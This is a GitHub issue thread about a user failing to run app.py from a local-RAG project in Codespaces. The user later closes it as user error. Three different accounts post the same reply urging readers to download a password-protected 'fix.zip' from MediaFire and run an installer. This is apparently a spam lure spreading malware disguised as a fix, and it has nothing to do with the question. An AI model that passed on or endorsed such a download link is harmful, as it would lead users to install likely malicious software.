### ISSUE TITLE
thoughts on running your code on github codespace?

### ISSUE THREAD

**Issue by pleabargain** [firstpersoncode/local-rag#1]
Hello
I got everything working right up to the point when I tried to run app.py

![image](https://github.com/user-attachments/assets/2c6fbd33-7ece-43d3-9a6d-9227141d16ff)
A new browser opened but I got
![image](https://github.com/user-attachments/assets/ac488ede-57c6-4d95-9181-883faaded4b6)

any advice on running your code in github codespace?
thank you

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pleabargain** [comment]
user error
